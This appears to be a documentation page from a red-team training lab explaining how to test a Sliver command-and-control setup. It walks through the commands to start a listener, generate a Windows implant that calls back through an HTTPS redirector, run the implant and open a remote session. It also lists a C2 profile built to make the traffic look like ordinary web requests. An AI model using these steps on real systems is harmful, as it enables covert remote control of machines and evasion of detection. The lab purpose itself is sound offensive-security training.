Skip to main content

Documentation Index

Fetch the complete documentation index at: https://mintlify.com/BaddKharma/redStack/llms.txt

Use this file to discover all available pages before exploring further.

Sliver is an open-source C2 framework developed by BishopFox, designed as a modern alternative to Cobalt Strike for red team operations. It supports multiple communication protocols — HTTP/S, DNS, mTLS, and WireGuard — and cross-compiles implants for Windows, Linux, and macOS. Sliver is primarily CLI-driven through an interactive console and supports multiplayer mode, allowing multiple operators to connect to a shared server daemon simultaneously. The Sliver daemon is installed and running automatically as a systemd service. A pre-built C2 profile (redstack) is generated at boot with the correct X-Request-ID token baked in.
The goal here is not to learn Sliver. The objective is to confirm the environment works end-to-end: get a Windows .exe implant calling back through the redirector. Once you have a callback, the lab is proven functional. For full documentation, see the Sliver wiki.

Access the Sliver server

Choose one of the following methods:
In the Guacamole portal, click Sliver C2 Server (SSH). This opens a browser-based SSH session directly to the Sliver machine.

Connect to Sliver and create a listener

1

Start the Sliver client

The Sliver daemon runs as a systemd service and starts automatically on boot. Connect using the pre-configured operator profile:
sliver-client
You will land at the sliver > prompt.
2

Import the C2 profile (first time only)

Import the pre-generated redstack C2 profile. This only needs to be done once per deployment — Sliver stores the profile in its database:
sliver > c2profiles import --file /home/admin/redstack-c2-profile.json --name redstack
The redstack profile is generated at boot with your deployment’s X-Request-ID token, a Chrome-style user agent, and realistic HTTP path and file name patterns. After import, it persists in Sliver’s database and does not need to be re-imported after a reconnect.
3

Start the HTTP listener

Start an HTTP listener on port 80. SSL terminates at the Apache redirector — Sliver receives plain HTTP internally:
sliver > http --lhost 0.0.0.0 --lport 80
Sliver listens on port 80, not 443. The implant connects over HTTPS to the redirector’s public address, which terminates SSL and forwards plain HTTP to Sliver on port 80 via VPC peering. Traffic is still encrypted from the target’s perspective.

Generate an implant

Generate a Windows executable using the redstack C2 profile. Replace <YOUR_DOMAIN> with your redirector_domain value from terraform.tfvars: 
sliver > generate --http https://<YOUR_DOMAIN>/cloud/storage/objects/ --os windows --arch amd64 --format exe --name sliver-training --c2profile redstack
For closed environments (no public DNS), use the redirector’s public IP instead: 
sliver > generate --http https://<REDIR_PUBLIC_IP>/cloud/storage/objects/ --os windows --arch amd64 --format exe --name sliver-training --c2profile redstack
The /cloud/storage/objects/ URI prefix is stripped by the redirector before forwarding to Sliver. Include it in the callback URL so the redirector can identify and route the traffic.

Deploy the implant

Transfer the generated implant to the Windows workstation. Run this from PowerShell on the Windows workstation — the sliver hostname resolves automatically via /etc/hosts: 
scp admin@sliver:/tmp/sliver-training.exe C:\Users\Administrator\Desktop\sliver-training.exe
Authenticate with the lab SSH password when prompted. Then double-click sliver-training.exe in File Explorer to execute it.
SCP from the Windows workstation does not interrupt your active Sliver console session. You can leave the Sliver console open in one terminal and run SCP in a separate PowerShell window.

Test the C2 session

1

Confirm a session appeared

In the Sliver console, list active sessions:
sliver > sessions
A new session should appear within a few seconds of executing the implant.
2

Interact with the session

Use the session ID to interact with it. You can combine the steps with the -i flag:
sliver > sessions -i <SESSION_ID>
Or as two separate commands:
sliver > use <SESSION_ID>
3

Run a test command

Verify operator context:
sliver (sliver-training) > whoami
Expected output: win-operator\Administrator
sliver (sliver-training) > pwd
4

Monitor redirector traffic

SSH to the redirector and watch the HTTPS access log:
sudo tail -f /var/log/apache2/redirector-ssl-access.log
Look for requests to paths under /cloud/storage/objects/. These are Sliver check-in requests being proxied through the redirector.

C2 profile internals

The redstack profile is generated by the Sliver setup script at boot using values from your Terraform configuration. The generated file lives at /home/admin/redstack-c2-profile.json on the Sliver server. 
cat /home/admin/redstack-c2-profile.json
Key fields the profile sets:
FieldValue
user_agentMozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
headersX-Request-ID: <your-token> with 100% send probability
extensionsjs, php, and empty (no extension)
filesjquery.min, bootstrap, app, main, index, script
pathsjs, assets, scripts, static, dist
cookiesPHPSESSID
The profile generates URLs that blend into normal web traffic patterns, consistent with the CDN-style redirector URI prefix.
For multiplayer use, generate a new operator config that connects to this Sliver server from another machine:
sudo /root/generate_operator_config.sh <operator-name>
The config is saved to /root/<operator-name>.cfg. Transfer it to the remote operator’s machine, then run sliver-client with it.

Reference

Sliver wiki

Official documentation for the Sliver C2 framework.

Redirector security layers

How the Apache redirector validates headers and routes URI prefixes.